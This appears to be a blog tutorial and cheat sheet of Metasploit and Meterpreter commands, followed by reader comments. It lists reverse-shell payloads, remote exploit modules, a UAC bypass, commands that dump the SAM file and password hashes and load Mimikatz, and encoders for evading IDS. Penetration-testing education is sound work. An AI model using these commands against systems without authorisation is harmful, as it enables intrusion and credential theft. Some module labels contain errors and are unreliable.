by 
Metasploit is an open source penetration testing framework used by security professionals worldwide. In this article, we’ll show you some of its most powerful commands. Metasploit has been around since 2004, but it still remains one of the best tools available today. We’ll teach you everything you need to know about using it.
Metasploit allows you to perform attacks on remote systems without having physical access to them. It also lets you test network devices like firewalls and routers. Metasploit is an open source penetration testing framework developed by Rapid7. It allows users to perform network attacks against their own systems or other networks.
In this article, we’ll show you some of the most useful commands for Metasploit. We hope these tips help you on your way to becoming a more skilled hacker!
- Meterpreter Cheat Sheet Commands
- List of Latest Metasploit Commands
- Windows VNC payload for Meterpreter
- Linux Reverse Meterpreter payload
- Common Metasploit Modules and Remote Windows Metasploit Modules
- Local Windows Metasploit Modules
- Auxilary Metasploit Modules
- Metasploit Powershell Modules
- Post Exploit Windows Metasploit Modules
- Common Metasploit Commands That You Need To Know
- Useful Metasploit commands
Passwords are like underwear. Don’t let people see it, change it very often, and you shouldn’t share it with strangers.
Meterpreter Cheat Sheet Commands
| Command | Description of CMD |
| upload file c:\\windows | Meterpreter uploads file to the Windows target machine |
| download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target |
| download c:\\windows\\repair\\sam /tmp | Meterpreter downloads the files from Windows target machine |
| execute -f c:\\windows\temp\exploit.exe | Meterpreter run .exe on target – handy for executing uploaded exploits |
| execute -f cmd -c | Creates a new channel using the cmd shell |
| ps | Meterpreter shows you the current processes that are running |
| shell | Meterpreter gets the shell access on the target machine or server |
| getsystem | Meterpreter attempts to do privilege escalation to gain access to the target |
| hashdump | Meterpreter attempts to dump the hashes on the target |
| portfwd add –l 3389 –p 3389 –r target | Meterpreter creates a port forward to the target machine |
| portfwd delete –l 3389 –p 3389 –r target | Meterpreter deletes the port forward function |
List of Latest Metasploit Commands
- Meterpreter Payloads:
- Windows reverse meterpreter payload
| Command | Description of CMD |
| set payload windows/meterpreter/reverse_tcp | Windows reverse tcp payload |
Windows VNC payload for Meterpreter
| Command | Description of CMD |
| set payload windows/vncinject/reverse_tcpset ViewOnly false | Meterpreter Windows VNC Payload |
Linux Reverse Meterpreter payload
| Command | Description of CMD |
| set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Common Metasploit Modules and Remote Windows Metasploit Modules
| Command | Description of CMD |
| use exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
| use exploit/windows/dcerpc/ms06_040_netapi | MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
| use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index | MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit |
Local Windows Metasploit Modules
| Command | Description of CMD |
| use exploit/windows/local/bypassuac | Bypass UAC on Windows 7 + Set target + arch, x86/64 |
Auxilary Metasploit Modules
| Command | Description of CMD |
| use auxiliary/scanner/http/dir_scanner | Metasploit HTTP directory scanner |
| use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner |
| use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
| use auxiliary/scanner/mysql/mysql_version | Metasploit MSSQL Version Scanner |
| use auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module |
Read also: The Perfect Guide to DDoS Like a Pro Hacker.
Metasploit Powershell Modules
| Command | Description of CMD |
| use exploit/multi/script/web_delivery | Metasploit powershell payload delivery module |
| post/windows/manage/powershell/exec_powershell | Metasploit upload and run powershell script through a session |
| use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy |
| use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload |
Post Exploit Windows Metasploit Modules
| Command | Description of CMD |
| run post/windows/gather/win_privs | Metasploit show privileges of the current user |
| use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords |
| oad mimikatz -> wdigest | Metasplit load Mimikatz |
| run post/windows/gather/local_admin_search_enum | Idenitfy other machines that the supplied domain user has administrative access to |
Common Metasploit Commands That You Need To Know
Metasploit command for updating Framework:
| apt update; apt install metasploit-framework |
The command mentioned above provides the latest version of the Metasploit framework. However, running this command might corrupt or break the copy of your software that is installed on your computer.
Metasploit msfconsole:
When you first run the Metasploit, the following window will open on your screen. If you don’t have any previous knowledge or information related to Metasploit, you can simply type “help” into the command line to view all available commands and information.
In order to save time and not overwhelm you with too much information, we will only be explaining the most essential Metasploit commands in this tutorial. With just a basic understanding of these commands, you should be up and running in Metasploit quickly. As you continue to use Metasploit, you will learn more about the advanced options. Also, most command descriptions should be very clear about what the command exactly does and how to use it. For now we will be looking at the most used basic Metasploit commands in this tutorial like:
- The Basic commands: search, use, back, help, info and exit.
- Exploit commands: set to set variables and show to show the exploit options, targets, payloads, encoders, nops and the advanced and evasion options.
- Exploit execution commands: run and exploit to run exploits against a target.
Useful Metasploit commands
Help command
The help command in msfconsole will return a list of possible commands together with a description. When there is an active exploit selected, the help command can be used to get a list of exploit commands.
Info command
The “use” command lets us select an exploit, and the “info” command lets us retrieve information about the selected exploit, like the name, platform, author, available targets, and more. In the screenshot below, we’ve used the info command on an exploit named ie_execcommand_uaf:
Search command
This command is used to search for different types of vulnerabilities and exploits from the msfconsole.
Metasploit currently contains over 1,500 different exploits, with new ones being added all the time. With this many exploits, it’s important to know how to use the search function effectively in order to find the one you need.
The search function can be used by simply typing in the command “search” followed by a search term – for example, if you’re looking for an exploit related to Flash player, you would type in “search flash“. Metasploit will then search for the given search term in the module names and descriptions.
Searching exploits with keywords
The search command can be used with a keyword in order to look for a specific author, OSVDB ID or platform. If you need help finding the right keyword, the ‘help search’ command can be used to display a list of available keywords in msfconsole. Here is an example:
‘help search’
This will return a list of keywords that can be used with the search command.
To search for modules with a CVE ID from 2016, use the following command: search cve:2016
msf > search cve:2016
This query will return all exploits with a CVE ID from 2016, as well as an auxiliary module scanner for the very recent Fortinet firewall SSH backdoor
Show options
With the help of this simple command, we can use show commands to display all the values required by the payload which can further be used to attack the victim PC or machine which we want to attack.
LHOST
This command will help you attack the WAN network. All you need to do is set the LHOST to your static IP address and forward all the other ports.
LPORT
If you want to use a LAN Network, you don’t have to port forward. You can use any port you want. But if you’re attacking a WAN Network, then you need to port forward the port you’re attacking from your router.
Show Payloads
With the help of this command, we use the show payloads command to return a list of compatible payloads for the exploit. In the picture below, Metasploit has loaded many compatible payloads:
Show Targets
This command will give you a list of operating systems that are vulnerable to the selected exploit. The output of the exploit is as follows:
adobe_flash_shader_drawing_fill exploit.
Show advanced
By using the show advanced command we can find all of the advanced options for exploits
Show encoders
This command is used to return all of the compatible encoders for payloads. These encoders can help evade simple IDS/IPS signatures that look for certain bytes in the payload.
Show nops
This command will return a list of NOP generators. NOP is the abbreviation for No Operation, and it is used to change the pattern to bypass simple IDS/IPS of common NOP sleds. These NOP generators are named after the CPU Architecture they’re configured for.
Show evasion
This show evasion command returns a list of available evasion techniques.
List of full A-Z Metasploit commands.
Conclusion
I hope this guide will be really helpful for you. Share it with your friends and family to help them solve their problems. If you have any questions, then leave them in the comment section. We are always here to help you if you need any help.
Hey there just wanted to give you a quick heads up. The text in your article seem to be running off the screen in Chrome. I’m not sure if this is a formatting issue or something to do with web browser compatibility but I figured I’d post to let you know. The style and design look great though! Hope you get the issue resolved soon. Thanks
Thanks for letting us know, we’ll try to fix it soon
Thanks for sharing. I read many of your blog posts, cool, your blog is very good.